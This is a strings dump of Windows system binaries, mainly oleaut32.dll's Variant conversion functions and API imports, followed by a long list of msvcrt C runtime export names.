VarBoolFromUI8 VarBstrCat VarBstrCmp VarBstrFromBool VarBstrFromCy VarBstrFromDate VarBstrFromDec VarBstrFromDisp VarBstrFromI1 VarBstrFromI2 VarBstrFromI4 VarBstrFromI8 VarBstrFromR4 VarBstrFromR8 VarBstrFromUI1 VarBstrFromUI2 VarBstrFromUI4 VarBstrFromUI8 VarCat VarCmp VarCyAbs VarCyAdd VarCyCmp VarCyCmpR8 VarCyFix VarCyFromBool VarCyFromDate VarCyFromDec VarCyFromDisp VarCyFromI1 VarCyFromI2 VarCyFromI4 VarCyFromI8 VarCyFromR4 VarCyFromR8 VarCyFromStr VarCyFromUI1 VarCyFromUI2 VarCyFromUI4 VarCyFromUI8 VarCyInt VarCyMul VarCyMulI4 VarCyMulI8 VarCyNeg VarCyRound VarCySub VarDateFromBool VarDateFromCy VarDateFromDec VarDateFromDisp VarDateFromI1 VarDateFromI2 VarDateFromI4 VarDateFromI8 VarDateFromR4 VarDateFromR8 VarDateFromStr VarDateFromUI1 VarDateFromUI2 VarDateFromUI4 VarDateFromUI8 VarDateFromUdate VarDateFromUdateEx VarDecAbs VarDecAdd VarDecCmp VarDecCmpR8 VarDecDiv VarDecFix VarDecFromBool VarDecFromCy VarDecFromDate VarDecFromDisp VarDecFromI1 VarDecFromI2 VarDecFromI4 VarDecFromI8 VarDecFromR4 VarDecFromR8 VarDecFromStr VarDecFromUI1 VarDecFromUI2 VarDecFromUI4 VarDecFromUI8 VarDecInt VarDecMul VarDecNeg VarDecRound VarDecSub VarDiv VarEqv VarFix VarFormat VarFormatCurrency VarFormatDateTime VarFormatFromTokens VarFormatNumber VarFormatPercent VarI1FromBool VarI1FromCy VarI1FromDate VarI1FromDec VarI1FromDisp VarI1FromI2 VarI1FromI4 VarI1FromI8 VarI1FromR4 VarI1FromR8 VarI1FromStr VarI1FromUI1 VarI1FromUI2 VarI1FromUI4 VarI1FromUI8 VarI2FromBool VarI2FromCy VarI2FromDate VarI2FromDec VarI2FromDisp VarI2FromI1 VarI2FromI4 VarI2FromI8 VarI2FromR4 VarI2FromR8 VarI2FromStr VarI2FromUI1 VarI2FromUI2 VarI2FromUI4 VarI2FromUI8 VarI4FromBool VarI4FromCy VarI4FromDate VarI4FromDec VarI4FromDisp VarI4FromI1 VarI4FromI2 VarI4FromI8 VarI4FromR4 VarI4FromR8 VarI4FromStr VarI4FromUI1 VarI4FromUI2 VarI4FromUI4 VarI4FromUI8 VarI8FromBool VarI8FromCy VarI8FromDate VarI8FromDec VarI8FromDisp VarI8FromI1 VarI8FromI2 VarI8FromR4 VarI8FromR8 VarI8FromStr VarI8FromUI1 VarI8FromUI2 VarI8FromUI4 VarI8FromUI8 VarIdiv VarImp VarInt VarMod VarMonthName VarMul VarNeg VarNot VarNumFromParseNum VarOr VarParseNumFromStr VarPow VarR4CmpR8 VarR4FromBool VarR4FromCy VarR4FromDate VarR4FromDec VarR4FromDisp VarR4FromI1 VarR4FromI2 VarR4FromI4 VarR4FromI8 VarR4FromR8 VarR4FromStr VarR4FromUI1 VarR4FromUI2 VarR4FromUI4 VarR4FromUI8 VarR8FromBool VarR8FromCy VarR8FromDate VarR8FromDec VarR8FromDisp VarR8FromI1 VarR8FromI2 VarR8FromI4 VarR8FromI8 VarR8FromR4 VarR8FromStr VarR8FromUI1 VarR8FromUI2 VarR8FromUI4 VarR8FromUI8 VarR8Pow VarR8Round VarRound VarSub VarTokenizeFormatString VarUI1FromBool VarUI1FromCy VarUI1FromDate VarUI1FromDec VarUI1FromDisp VarUI1FromI1 VarUI1FromI2 VarUI1FromI4 VarUI1FromI8 VarUI1FromR4 VarUI1FromR8 VarUI1FromStr VarUI1FromUI2 VarUI1FromUI4 VarUI1FromUI8 VarUI2FromBool VarUI2FromCy VarUI2FromDate VarUI2FromDec VarUI2FromDisp VarUI2FromI1 VarUI2FromI2 VarUI2FromI4 VarUI2FromI8 VarUI2FromR4 VarUI2FromR8 VarUI2FromStr VarUI2FromUI1 VarUI2FromUI4 VarUI2FromUI8 VarUI4FromBool VarUI4FromCy VarUI4FromDate VarUI4FromDec VarUI4FromDisp VarUI4FromI1 VarUI4FromI2 VarUI4FromI4 VarUI4FromI8 VarUI4FromR4 VarUI4FromR8 VarUI4FromStr VarUI4FromUI1 VarUI4FromUI2 VarUI4FromUI8 VarUI8FromBool VarUI8FromCy VarUI8FromDate VarUI8FromDec VarUI8FromDisp VarUI8FromI1 VarUI8FromI2 VarUI8FromI8 VarUI8FromR4 VarUI8FromR8 VarUI8FromStr VarUI8FromUI1 VarUI8FromUI2 VarUI8FromUI4 VarUdateFromDate VarWeekdayName VarXor VariantChangeType VariantChangeTypeEx VariantClear VariantCopy VariantCopyInd VariantInit VariantTimeToDosDateTime VariantTimeToSystemTime VectorFromBstr Y__^[ VW9E @_^[] j,h8A IItb _^[] QQSVW _^[] uwj; t+;} Ah;=( u0;=$ QSVW !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ A12E3OU CEEEE ?UUU !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ YAAA CEEEEIIIINOOO OUUUY AAO AEAEEIIIIOO?OUUUI !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ AACENOUAAAAAACEEEEIIIINOOOOOUUUU AAO AEAEEIIIIOO?OUUUI !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ CEEEE !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ CENOUAAAA CEEEEI IINO UUUU !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ AACENOUAAAAAACEEEEIIIINOOOOOUUUU Bf; r&f;E !"#$%&'()*+,-. 0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVVXUZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVVXUZ{|}~ AAAAAAACEEEEIIIIDNOOOOO OUUUUU AAAAAAACEEEEIIIIDNOOOOO OUUUUU _[^] !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ AAAA AAAA SOFTWARE\Microsoft\OLEAUT _^[] PVSh OACACHEPARAMS OAPERUSERTLIBREG OANOCACHE uj(P QRPh SXS.DLL SxsOleAut32MapConfiguredClsidToReferenceClsid SxsOleAut32RedirectTypeLibrary t Kk GG;E PhX! @@f; @@f; @@f; @@f; FVWh uu[f j:Xf j\Xf p6PQ QQSVW PhX! _^[] j-Xf FFjEXf Y__^[ j$Xf < O@ H\95L j1Xf @,j#f F@@f j1ZFf uj.Z3 j Xf =sRc bad allocation wtSP ptSQ $SVW ClVP sdVh f9KJv CJ9E KLQS f;KJ CLRPS 0f9~ v>f9} [_^] QQV3 SVW< uXSh HtcHu t3HHt/Ht"Ht Wt0f t%NNt$NtZNNt NtwNuS JtMJt Jt2Jt tKHt3 u[j tv9E Ati3 tsHtXHt4 HHt too long t2h| invalid map/set iterator string too long invalid string position Invalid parameter passed to C runtime function. _^[] ADVAPI32.dll RegCreateKeyW RegOpenKeyW RegCreateKeyA RegQueryValueW RegEnumKeyW RegSetValueW RegDeleteKeyW GDI32.dll USER32.dll RPCRT4.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll KERNEL32.dll ntdll.dll msvcrt.dll ole32.dll MkParseDisplayName WriteClassStg WriteFmtUserTypeStg ReadClassStg CreateBindCtx StgCreateDocfile CoCreateInstance CreateStreamOnHGlobal CreateILockBytesOnHGlobal StgCreateDocfileOnILockBytes ReleaseStgMedium ObjectStublessClient29 ObjectStublessClient28 ObjectStublessClient27 NdrProxyForwardingFunction14 NdrProxyForwardingFunction13 NdrProxyForwardingFunction12 NdrProxyForwardingFunction11 NdrProxyForwardingFunction10 NdrProxyForwardingFunction9 NdrProxyForwardingFunction8 NdrProxyForwardingFunction7 NdrProxyForwardingFunction6 NdrProxyForwardingFunction5 ObjectStublessClient26 ObjectStublessClient25 ObjectStublessClient24 ObjectStublessClient23 ObjectStublessClient22 ObjectStublessClient21 ObjectStublessClient20 ObjectStublessClient19 ObjectStublessClient18 ObjectStublessClient17 ObjectStublessClient16 ObjectStublessClient15 ObjectStublessClient14 ObjectStublessClient13 ObjectStublessClient12 ObjectStublessClient11 ObjectStublessClient10 ObjectStublessClient9 ObjectStublessClient8 NdrProxyForwardingFunction4 NdrProxyForwardingFunction3 ObjectStublessClient7 ObjectStublessClient3 ObjectStublessClient6 ObjectStublessClient5 ObjectStublessClient4 HWND_UserFree HWND_UserUnmarshal HWND_UserMarshal HWND_UserSize HPALETTE_UserFree HPALETTE_UserUnmarshal HPALETTE_UserMarshal HPALETTE_UserSize STGMEDIUM_UserFree STGMEDIUM_UserUnmarshal STGMEDIUM_UserMarshal STGMEDIUM_UserSize CLIPFORMAT_UserFree CLIPFORMAT_UserUnmarshal CLIPFORMAT_UserMarshal CLIPFORMAT_UserSize DcomChannelSetHResult CoReleaseMarshalData CoUnmarshalInterface CoMarshalInterface CoUnmarshalHresult CoMarshalHresult CLSIDFromString CoGetMalloc CoGetClassObject CreateItemMoniker GetRunningObjectTable StringFromGUID2 WdtpInterfacePointer_UserMarshal WdtpInterfacePointer_UserSize WdtpInterfacePointer_UserUnmarshal SetErrorInfo GetErrorInfo CreateErrorInfo _CIpow _clearfp memcpy_s memmove_s ??0exception@@QAE@ABQBD@Z ?what@exception@@UBEPBDXZ ??0exception@@QAE@XZ ??1exception@@UAE@XZ ??0exception@@QAE@ABV0@@Z _XcptFilter atoi malloc _initterm _amsg_exit _except_handler4_common ??1type_info@@UAE@XZ _unlock __dllonexit _lock _onexit memset _errno strncpy_s strcat_s strrchr strchr _wsplitpath_s _wmakepath_s _stat sscanf_s _ultow remove _ultow_s free calloc strcpy_s _wcslwr wcsncat_s wcsrchr _CxxThrowException __CxxFrameHandler3 _CIfmod wcsncpy_s wcstoul memmove iswspace _wcsnicmp wcsncmp wcschr _itoa atol _ftol2_sse floor ceil wcscpy_s wcscat_s _ui64tow swprintf_s _i64tow _itow _wcsicmp _wtoi modf _ftol2 memcpy RtlRunOnceBeginInitialize GetCurrentThreadId GetTickCount QueryPerformanceCounter OutputDebugStringA InitOnceInitialize InitOnceComplete InitOnceBeginInitialize InitializeCriticalSection GetCurrentProcessId GetSystemTimeAsFileTime TerminateProcess UnhandledExceptionFilter SetUnhandledExceptionFilter InterlockedDecrement SetErrorMode GetDriveTypeW GetFileSize CreateFileMappingW DelayLoadFailureHook GetProcAddress GetLastError FreeLibrary InterlockedCompareExchange LoadLibraryExA TlsGetValue GetSystemDefaultLCID GetUserDefaultLCID GetSystemInfo LCMapStringW GetLocaleInfoW InterlockedIncrement HeapAlloc GetProcessHeap HeapFree GetLocaleInfoA LeaveCriticalSection EnterCriticalSection GetNumberFormatW GetCurrencyFormatW CompareStringW GetSystemDirectoryW GetLocalTime IsBadWritePtr IsBadReadPtr GetStringTypeExW InterlockedExchange GetModuleHandleW CloseHandle GetCurrentProcess GetCurrentThread MultiByteToWideChar GetTimeFormatW GetDateFormatW TerminateThread WaitForMultipleObjects SetThreadPriority SetEvent Sleep CreateEventW WaitForSingleObject CreateThread LoadLibraryW WideCharToMultiByte GetVersion GlobalFree GlobalUnlock GlobalLock GlobalAlloc MulDiv GlobalSize GlobalHandle GlobalReAlloc LockResource IsDBCSLeadByte LoadResource FindResourceW _lclose _lread _lwrite _llseek DeleteCriticalSection InitializeCriticalSectionAndSpinCount IsWow64Process lstrlenW GlobalDeleteAtom GlobalAddAtomW GetEnvironmentVariableA TlsFree DebugBreak TlsAlloc TlsSetValue SetLastError Wow64RevertWow64FsRedirection Wow64DisableWow64FsRedirection CreateFileW lstrcmpiA CompareStringA LoadLibraryA CreateFileA SearchPathA GetFullPathNameA SearchPathW GetFullPathNameW UnmapViewOfFile MapViewOfFile RegQueryValueExA RegFlushKey RegSetValueExA RegNotifyChangeKeyValue RegQueryValueExW RegOpenKeyExA RegEnumKeyExA RegSetValueExW RegCloseKey RegOpenUserClassesRoot RegOpenKeyExW RegQueryInfoKeyA RegCreateKeyExW OpenThreadToken SetThreadToken OpenProcessToken GetTokenInformation EqualSid CStdStubBuffer_Disconnect CStdStubBuffer_Invoke CStdStubBuffer_IsIIDSupported CStdStubBuffer_CountRefs CStdStubBuffer_DebugServerQueryInterface NdrGetDcomProtocolVersion RpcRaiseException NdrGetUserMarshalInfo NdrDllGetClassObject NdrCStdStubBuffer_Release NdrCStdStubBuffer2_Release CreateProxyFromTypeInfo CreateStubFromTypeInfo NdrStubCall2 NdrStubForwardingFunction CStdStubBuffer_Connect CStdStubBuffer_AddRef CStdStubBuffer_QueryInterface IUnknown_Release_Proxy NdrClientCall2 IUnknown_AddRef_Proxy IUnknown_QueryInterface_Proxy NdrOleFree NdrOleAllocate CStdStubBuffer_DebugServerRelease GetClientRect RegisterClipboardFormatW WinHelpW EnableWindow GetMessageA DispatchMessageA PostQuitMessage GetActiveWindow SetActiveWindow SetFocus GetTopWindow IsWindowUnicode GetDialogBaseUnits LoadStringW GetKeyState GetDlgItem GetFocus SendMessageW GetParent CharLowerA GetWindowTextA CharNextA SetWindowLongW CreateWindowExW DestroyWindow GetWindowLongW IsWindow DefWindowProcW RegisterClassW GetClassInfoW DispatchMessageW TranslateMessage GetMessageW PostMessageW RegisterWindowMessageA SystemParametersInfoW GetDC ReleaseDC DrawIcon GetSystemMetrics GetIconInfo CreateIcon CreateCursor DestroyIcon GetSysColor CopyIcon CopyImage CreateHalftonePalette GetTextExtentPointW SetBitmapBits SetDIBits SaveDC IntersectClipRect GetWindowOrgEx OffsetViewportOrgEx PlayEnhMetaFile EnumMetaFile RestoreDC SetStretchBltMode SetBkColor SetTextColor GetCurrentObject GetObjectType GetStockObject RealizePalette StretchBlt GetDIBits DeleteEnhMetaFile DeleteMetaFile PlayMetaFileRecord SelectPalette StretchDIBits CreateDIBSection GetPaletteEntries CreatePalette GetEnhMetaFileBits GetMetaFileBitsEx CreateCompatibleDC CreateCompatibleBitmap BitBlt DeleteDC SetEnhMetaFileBits SetMapMode SetWindowOrgEx SetWindowExtEx SetViewportOrgEx SetViewportExtEx GetWinMetaFileBits GetEnhMetaFileHeader GetObjectW GetBitmapDimensionEx SetMetaFileBitsEx CreateBitmap PatBlt DeleteObject CreateFontIndirectW GetDeviceCaps SelectObject GetTextMetricsW GetTextFaceW EnumFontFamiliesExW Escape CreateDIBitmap GetBitmapBits RSDS oleaut32.pdb .?AVSafeIntException@@ .?AVCAtlException@ATL@@ .?AVbad_alloc@std@@ .?AVexception@@ .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ !This program cannot be run in DOS mode. aRichR .text `.data .rsrc @.reloc USER32.dll ntdll.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Security-Base-L1-1-0.dll KERNEL32.dll GDI32.dll MSCTF.dll ?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ msvcrt.dll $I10_OUTPUT ??0__non_rtti_object@@QAE@ABV0@@Z ??0__non_rtti_object@@QAE@PBD@Z ??0bad_cast@@AAE@PBQBD@Z ??0bad_cast@@QAE@ABQBD@Z ??0bad_cast@@QAE@ABV0@@Z ??0bad_cast@@QAE@PBD@Z ??0bad_typeid@@QAE@ABV0@@Z ??0bad_typeid@@QAE@PBD@Z ??0exception@@QAE@ABQBD@Z ??0exception@@QAE@ABQBDH@Z ??0exception@@QAE@ABV0@@Z ??0exception@@QAE@XZ ??1__non_rtti_object@@UAE@XZ ??1bad_cast@@UAE@XZ ??1bad_typeid@@UAE@XZ ??1exception@@UAE@XZ ??1type_info@@UAE@XZ ??2@YAPAXI@Z ??2@YAPAXIHPBDH@Z ??3@YAXPAX@Z ??4__non_rtti_object@@QAEAAV0@ABV0@@Z ??4bad_cast@@QAEAAV0@ABV0@@Z ??4bad_typeid@@QAEAAV0@ABV0@@Z ??4exception@@QAEAAV0@ABV0@@Z ??8type_info@@QBEHABV0@@Z ??9type_info@@QBEHABV0@@Z ??_7__non_rtti_object@@6B@ ??_7bad_cast@@6B@ ??_7bad_typeid@@6B@ ??_7exception@@6B@ ??_E__non_rtti_object@@UAEPAXI@Z ??_Ebad_cast@@UAEPAXI@Z ??_Ebad_typeid@@UAEPAXI@Z ??_Eexception@@UAEPAXI@Z ??_Fbad_cast@@QAEXXZ ??_Fbad_typeid@@QAEXXZ ??_G__non_rtti_object@@UAEPAXI@Z ??_Gbad_cast@@UAEPAXI@Z ??_Gbad_typeid@@UAEPAXI@Z ??_Gexception@@UAEPAXI@Z ??_U@YAPAXI@Z ??_U@YAPAXIHPBDH@Z ??_V@YAXPAX@Z ?_query_new_handler@@YAP6AHI@ZXZ ?_query_new_mode@@YAHXZ ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z ?_set_new_mode@@YAHH@Z ?_set_se_translator@@YAP6AXIPAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z ?before@type_info@@QBEHABV1@@Z ?name@type_info@@QBEPBDXZ ?raw_name@type_info@@QBEPBDXZ ?set_new_handler@@YAP6AXXZP6AXXZ@Z ?set_terminate@@YAP6AXXZP6AXXZ@Z ?set_unexpected@@YAP6AXXZP6AXXZ@Z ?terminate@@YAXXZ ?unexpected@@YAXXZ ?what@exception@@UBEPBDXZ _CIacos _CIasin _CIatan _CIatan2 _CIcos _CIcosh _CIexp _CIfmod _CIlog _CIlog10 _CIpow _CIsin _CIsinh _CIsqrt _CItan _CItanh _CrtCheckMemory _CrtDbgBreak _CrtDbgReport _CrtDbgReportV _CrtDbgReportW _CrtDbgReportWV _CrtDoForAllClientObjects _CrtDumpMemoryLeaks _CrtIsMemoryBlock _CrtIsValidHeapPointer _CrtIsValidPointer _CrtMemCheckpoint _CrtMemDifference _CrtMemDumpAllObjectsSince _CrtMemDumpStatistics _CrtReportBlockType _CrtSetAllocHook _CrtSetBreakAlloc _CrtSetDbgBlockType _CrtSetDbgFlag _CrtSetDumpClient _CrtSetReportFile _CrtSetReportHook _CrtSetReportHook2 _CrtSetReportMode _CxxThrowException _EH_prolog _Getdays _Getmonths _Gettnames _HUGE _Strftime _XcptFilter __CppXcptFilter __CxxCallUnwindDelDtor __CxxCallUnwindDtor __CxxCallUnwindVecDtor __CxxDetectRethrow __CxxExceptionFilter __CxxFrameHandler __CxxFrameHandler2 __CxxFrameHandler3 __CxxLongjmpUnwind __CxxQueryExceptionSize __CxxRegisterExceptionObject __CxxUnregisterExceptionObject __DestructExceptionObject __RTCastToVoid __RTDynamicCast __RTtypeid __STRINGTOLD ___lc_codepage_func ___lc_collate_cp_func ___lc_handle_func ___mb_cur_max_func ___setlc_active_func ___unguarded_readlc_active_add_func __argc __argv __badioinfo __crtCompareStringA __crtCompareStringW __crtGetLocaleInfoW __crtGetStringTypeW __crtLCMapStringA __crtLCMapStringW __daylight __dllonexit __doserrno __dstbias __fpecode __getmainargs __initenv __iob_func __isascii __iscsym __iscsymf __lc_codepage __lc_collate_cp __lc_handle __lconv_init __libm_sse2_acos __libm_sse2_acosf __libm_sse2_asin __libm_sse2_asinf __libm_sse2_atan __libm_sse2_atan2 __libm_sse2_atanf __libm_sse2_cos __libm_sse2_cosf __libm_sse2_exp __libm_sse2_expf __libm_sse2_log __libm_sse2_log10 __libm_sse2_log10f __libm_sse2_logf __libm_sse2_pow __libm_sse2_powf __libm_sse2_sin __libm_sse2_sinf __libm_sse2_tan __libm_sse2_tanf __mb_cur_max __p___argc __p___argv __p___initenv __p___mb_cur_max __p___wargv __p___winitenv __p__acmdln __p__amblksiz __p__commode __p__daylight __p__dstbias __p__environ __p__fileinfo __p__fmode __p__iob __p__mbcasemap __p__mbctype __p__osver __p__pctype __p__pgmptr __p__pwctype __p__timezone __p__tzname __p__wcmdln __p__wenviron __p__winmajor __p__winminor __p__winver __p__wpgmptr __pctype_func __pioinfo __pwctype_func __pxcptinfoptrs __set_app_type __setlc_active __setusermatherr __strncnt __threadhandle __threadid __toascii __unDName __unDNameEx __uncaught_exception __unguarded_readlc_active __wargv __wcserror __wcserror_s __wcsncnt __wgetmainargs __winitenv _abnormal_termination _abs64 _access _access_s _acmdln _adj_fdiv_m16i _adj_fdiv_m32 _adj_fdiv_m32i _adj_fdiv_m64 _adj_fdiv_r _adj_fdivr_m16i _adj_fdivr_m32 _adj_fdivr_m32i _adj_fdivr_m64 _adj_fpatan _adj_fprem _adj_fprem1 _adj_fptan _adjust_fdiv _aexit_rtn _aligned_free _aligned_free_dbg _aligned_malloc _aligned_malloc_dbg _aligned_offset_malloc _aligned_offset_malloc_dbg _aligned_offset_realloc _aligned_offset_realloc_dbg _aligned_realloc _aligned_realloc_dbg _amsg_exit _assert _atodbl _atodbl_l _atof_l _atoflt_l _atoi64 _atoi64_l _atoi_l _atol_l _atoldbl _atoldbl_l _beep _beginthread _beginthreadex _c_exit _cabs _callnewh _calloc_dbg _cexit _cgets _cgets_s _cgetws _cgetws_s _chdir _chdrive _chgsign _chkesp _chmod _chsize _chsize_s _chvalidator _chvalidator_l _clearfp _close _commit _commode _control87 _controlfp _controlfp_s _copysign _cprintf _cprintf_l _cprintf_p _cprintf_p_l _cprintf_s _cprintf_s_l _cputs _cputws _creat _crtAssertBusy _crtBreakAlloc _crtDbgFlag _cscanf _cscanf_l _cscanf_s _cscanf_s_l _ctime32 _ctime32_s _ctime64 _ctime64_s _ctype _cwait _cwprintf _cwprintf_l _cwprintf_p _cwprintf_p_l _cwprintf_s _cwprintf_s_l _cwscanf _cwscanf_l _cwscanf_s _cwscanf_s_l _daylight _difftime32 _difftime64 _dstbias _dup _dup2 _ecvt _ecvt_s _endthread _endthreadex _environ _eof _errno _except_handler2 _except_handler3 _except_handler4_common _execl _execle _execlp _execlpe _execv _execve _execvp _execvpe _exit _expand _expand_dbg _fcloseall _fcvt _fcvt_s _fdopen _fgetchar _fgetwchar _filbuf _fileinfo _filelength _filelengthi64 _fileno _findclose _findfirst _findfirst64 _findfirsti64 _findnext _findnext64 _findnexti64 _finite _flsbuf _flushall _fmode _fpclass _fpieee_flt _fpreset _fprintf_l _fprintf_p _fprintf_p_l _fprintf_s_l _fputchar _fputwchar _free_dbg _freea _freea_s _fscanf_l _fscanf_s_l _fseeki64 _fsopen _fstat _fstat64 _fstati64 _ftime _ftime32 _ftime32_s _ftime64 _ftime64_s _ftol _ftol2 _ftol2_sse _ftol2_sse_excpt _fullpath _fullpath_dbg _futime _futime32 _futime64 _fwprintf_l _fwprintf_p _fwprintf_p_l _fwprintf_s_l _fwscanf_l _fwscanf_s_l _gcvt _gcvt_s _get_doserrno _get_environ _get_errno _get_fileinfo _get_fmode _get_heap_handle _get_osfhandle _get_osplatform _get_osver _get_output_format _get_pgmptr _get_sbh_threshold _get_wenviron _get_winmajor _get_winminor _get_winver _get_wpgmptr _getch _getche _getcwd _getdcwd _getdiskfree _getdllprocaddr _getdrive _getdrives _getmaxstdio _getmbcp _getpid _getsystime _getw _getwch _getwche _getws _global_unwind2 _gmtime32 _gmtime32_s _gmtime64 _gmtime64_s _heapadd _heapchk _heapmin _heapset _heapused _heapwalk _hypot _i64toa _i64toa_s _i64tow _i64tow_s _initterm _initterm_e _inp _inpd _inpw _invalid_parameter _iob _isalnum_l _isalpha_l _isatty _iscntrl_l _isctype _isctype_l _isdigit_l _isgraph_l _isleadbyte_l _islower_l _ismbbalnum _ismbbalnum_l _ismbbalpha _ismbbalpha_l _ismbbgraph _ismbbgraph_l _ismbbkalnum _ismbbkalnum_l _ismbbkana _ismbbkana_l _ismbbkprint _ismbbkprint_l _ismbbkpunct _ismbbkpunct_l _ismbblead _ismbblead_l _ismbbprint _ismbbprint_l _ismbbpunct _ismbbpunct_l _ismbbtrail _ismbbtrail_l _ismbcalnum _ismbcalnum_l _ismbcalpha _ismbcalpha_l _ismbcdigit _ismbcdigit_l _ismbcgraph _ismbcgraph_l _ismbchira _ismbchira_l _ismbckata _ismbckata_l _ismbcl0 _ismbcl0_l _ismbcl1 _ismbcl1_l _ismbcl2 _ismbcl2_l _ismbclegal _ismbclegal_l _ismbclower _ismbclower_l _ismbcprint _ismbcprint_l _ismbcpunct _ismbcpunct_l _ismbcspace _ismbcspace_l _ismbcsymbol _ismbcsymbol_l _ismbcupper _ismbcupper_l _ismbslead _ismbslead_l _ismbstrail _ismbstrail_l _isnan _isprint_l _isspace_l _isupper_l _iswalnum_l _iswalpha_l _iswcntrl_l _iswctype_l _iswdigit_l _iswgraph_l _iswlower_l _iswprint_l _iswpunct_l _iswspace_l _iswupper_l _iswxdigit_l _isxdigit_l _itoa _itoa_s _itow _itow_s _kbhit _lfind _lfind_s _loaddll _local_unwind2 _local_unwind4 _localtime32 _localtime32_s _localtime64 _localtime64_s _lock _locking _logb _longjmpex _lrotl _lrotr _lsearch _lsearch_s _lseek _lseeki64 _ltoa _ltoa_s _ltow _ltow_s _makepath _makepath_s _malloc_dbg _mbbtombc _mbbtombc_l _mbbtype _mbcasemap _mbccpy _mbccpy_l _mbccpy_s _mbccpy_s_l _mbcjistojms _mbcjistojms_l _mbcjmstojis _mbcjmstojis_l _mbclen _mbclen_l _mbctohira _mbctohira_l _mbctokata _mbctokata_l _mbctolower _mbctolower_l _mbctombb _mbctombb_l _mbctoupper _mbctoupper_l _mbctype _mblen_l _mbsbtype _mbsbtype_l _mbscat _mbscat_s _mbscat_s_l _mbschr _mbschr_l _mbscmp _mbscmp_l _mbscoll _mbscoll_l _mbscpy _mbscpy_s _mbscpy_s_l _mbscspn _mbscspn_l _mbsdec _mbsdec_l _mbsdup _mbsicmp _mbsicmp_l _mbsicoll _mbsicoll_l _mbsinc _mbsinc_l _mbslen _mbslen_l _mbslwr _mbslwr_l _mbslwr_s _mbslwr_s_l _mbsnbcat _mbsnbcat_l _mbsnbcat_s _mbsnbcat_s_l _mbsnbcmp _mbsnbcmp_l _mbsnbcnt _mbsnbcnt_l _mbsnbcoll _mbsnbcoll_l _mbsnbcpy _mbsnbcpy_l _mbsnbcpy_s _mbsnbcpy_s_l _mbsnbicmp _mbsnbicmp_l _mbsnbicoll _mbsnbicoll_l _mbsnbset _mbsnbset_l _mbsnbset_s _mbsnbset_s_l _mbsncat _mbsncat_l _mbsncat_s _mbsncat_s_l _mbsnccnt _mbsnccnt_l _mbsncmp _mbsncmp_l _mbsncoll _mbsncoll_l _mbsncpy _mbsncpy_l _mbsncpy_s _mbsncpy_s_l _mbsnextc _mbsnextc_l _mbsnicmp _mbsnicmp_l _mbsnicoll _mbsnicoll_l _mbsninc _mbsninc_l _mbsnlen _mbsnlen_l _mbsnset _mbsnset_l _mbsnset_s _mbsnset_s_l _mbspbrk _mbspbrk_l _mbsrchr _mbsrchr_l _mbsrev _mbsrev_l _mbsset _mbsset_l _mbsset_s _mbsset_s_l _mbsspn _mbsspn_l _mbsspnp _mbsspnp_l _mbsstr _mbsstr_l _mbstok _mbstok_l _mbstok_s _mbstok_s_l _mbstowcs_l _mbstowcs_s_l _mbstrlen _mbstrlen_l _mbstrnlen _mbstrnlen_l _mbsupr _mbsupr_l _mbsupr_s _mbsupr_s_l _mbtowc_l _memccpy _memicmp _memicmp_l _mkdir _mkgmtime _mkgmtime32 _mkgmtime64 _mktemp _mktemp_s _mktime32 _mktime64 _msize _msize_debug _nextafter _onexit _open _open_osfhandle _osplatform _osver _outp _outpd _outpw _pclose _pctype _pgmptr _pipe _popen _printf_l _printf_p _printf_p_l _printf_s_l _purecall _putch _putenv _putenv_s _putw _putwch _putws _pwctype _read _realloc_dbg _resetstkoflw _rmdir _rmtmp _rotl _rotl64 _rotr _rotr64 _safe_fdiv _safe_fdivr _safe_fprem _safe_fprem1 _scalb _scanf_l _scanf_s_l _scprintf _scprintf_l _scprintf_p_l _scwprintf _scwprintf_l _scwprintf_p_l _searchenv _searchenv_s _seh_longjmp_unwind _seh_longjmp_unwind4 _set_SSE2_enable _set_controlfp _set_doserrno _set_errno _set_error_mode _set_fileinfo _set_fmode _set_output_format _set_sbh_threshold _seterrormode _setjmp _setjmp3 _setmaxstdio _setmbcp _setmode _setsystime _sleep _snprintf _snprintf_c _snprintf_c_l _snprintf_l _snprintf_s _snprintf_s_l _snscanf _snscanf_l _snscanf_s _snscanf_s_l _snwprintf _snwprintf_l _snwprintf_s _snwprintf_s_l _snwscanf _snwscanf_l _snwscanf_s _snwscanf_s_l _sopen _sopen_s _spawnl _spawnle _spawnlp _spawnlpe _spawnv _spawnve _spawnvp _spawnvpe _splitpath _splitpath_s _sprintf_l _sprintf_p_l _sprintf_s_l _sscanf_l _sscanf_s_l _stat _stat64 _stati64 _statusfp 